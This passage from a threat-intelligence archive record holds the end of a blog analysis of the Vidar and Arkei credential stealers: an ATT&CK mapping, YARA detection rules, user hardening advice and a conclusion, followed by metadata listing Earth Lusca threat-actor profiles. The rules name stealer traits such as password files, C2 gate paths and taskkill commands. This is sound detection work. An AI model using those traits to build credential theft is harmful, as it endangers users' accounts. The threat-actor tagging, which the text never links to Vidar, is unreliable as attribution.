ATT\u0026CK\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 33 of 36\n\nDiscovery – System Information Discovery\r\nDiscovery – System Time Discovery\r\nDiscovery – Query Registry\r\nDiscovery – Process Discovery\r\nExecution – Command-Line Interface\r\nExecution – Execution through Module Load\r\nCredential Access – Credentials in Files\r\nCollection – Screen Capture\r\nCollection – Data From Removable Media \r\nCollection – Data from Local System\r\nExfiltration – Data Compressed\r\nYara Rules\r\nVidar\r\nrule Vidar_Stealer : Vidar\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Vidar stealer\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = { 56 69 64 61 72 }\r\n $s2 = { 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 }\r\n condition:\r\n $mz at 0 and ( (all of ($s*)) )\r\n}\r\nrule Vidar_Early : Vidar\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Vidar stealer - Early versions\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = { 56 69 64 61 72 }\r\n $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }\r\n condition:\r\n $mz at 0 and all of ($hx*) and not $s1\r\n}\r\nrule AntiVidar : Vidar\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Anti Vidar - Vidar Cracked Version\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = { 56 69 64 61 72 }\r\n $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }\r\n $hx2 = { 78 61 6B 66 6F 72 2E 6E 65 74 00 }\r\n condition:\r\n $mz at 0 and all of ($hx*) and not $s1\r\n}\r\nArkei\r\n rule Arkei : Arkei\r\nrule Arkei : Arkei\r\n{\r\n meta:\r\n Author = \"Fumik0_\"\r\n Description = \"Rule to detect Arkei\"\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 34 of 36\n\nDate = \"2018/12/11\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = \"Arkei\" wide ascii\r\n $s2 = \"/server/gate\" wide 
ascii\r\n $s3 = \"/server/grubConfig\" wide ascii\r\n $s4 = \"\\\\files\\\\\" wide ascii\r\n $s5 = \"SQLite\" wide ascii\r\n $x1 = \"/c taskkill /im\" wide ascii\r\n $x2 = \"screenshot.jpg\" wide ascii\r\n $x3 = \"files\\\\passwords.txt\" wide ascii\r\n $x4 = \"http://ip-api.com/line/\" wide ascii\r\n $x5 = \"[Hardware]\" wide ascii\r\n $x6 = \"[Network]\" wide ascii\r\n $x7 = \"[Processes]\" wide ascii\r\n $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }\r\n condition:\r\n $mz at 0 and\r\n ( (all of ($s*)) or ((all of ($x*)) and not $hx1))\r\n}\r\nGithub\r\nExtract Vidar Config\r\nProfiles dumped\r\nRecommendations\r\nThis is, as usual, the same thing that I said about my precedent blog post.\r\nAlways running stuff inside a VM, be sure to install a lot of stuff linked to the hypervisor (like Guest Addons tools) \r\nto trigger as much as possible all kind of possible Anti-VM detection and closing malware.\r\nWhen you have done with your activities stop the VM and restore it with a Specific clean snapshot.\r\nAvoid storing files at a pre-destined path (Desktop, Documents, Downloads), put at a place that is not common.\r\nDon’t be stupid to click on cracks on youtube, hack software for popular games, or “wonderful” easy cash money\r\n(like Free Bitcoin Program /facepalm).\r\nFlush your browser after each visit, never saved your passwords directly on your browser or using auto-fill features.\r\nDon’t use the same password for all your websites (use 2FA and it’s possible).\r\nConclusion\r\nThis analysis was a kind of a mystery game. It’s hard to understand if Vidar is an evolution of Arkei or a forked malware\r\nbased on his code. As far it seems this is currently an active one and growing up. A lot of updates are pushed on it regularly\r\nprobably due because this is a young (forked/copycat) malware. 
With the fact, that this stealer was also using the skin theme\r\nof Android Lokibot (due to the cracked version), this could really lose some minds for identifying what is the correct name\r\nof the C2, without any samples to analyze. For now, let’s see with the time if we will more answers to put the puzzle\r\ntogether for this stealer. ¯\\_(ツ)_/¯\r\nOn my side, if I could sum up this year. I have done way more things than I could imagine because 2018 was a really\r\n“reaaalllyyyy” thought year, with a lot of problems and huge issues. Let’s see how this next year will be. But now, it’s time\r\nto rest and eat because there were so many sleep hours destroy and skip meals this year for learning stuff.\r\nSpecial thanks to my buddies (they will know who they are), you are the best \u003c3\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 35 of 36\n\n#HappyHunting\r\n#SeeYouIn2019\r\nSource: https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 36 of 36",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/"
	],
	"report_names": [
		"lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434569,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c.pdf",
		"text": "https://archive.orkl.eu/e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c.txt",
		"img": "https://archive.orkl.eu/e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c.jpg"
	}
}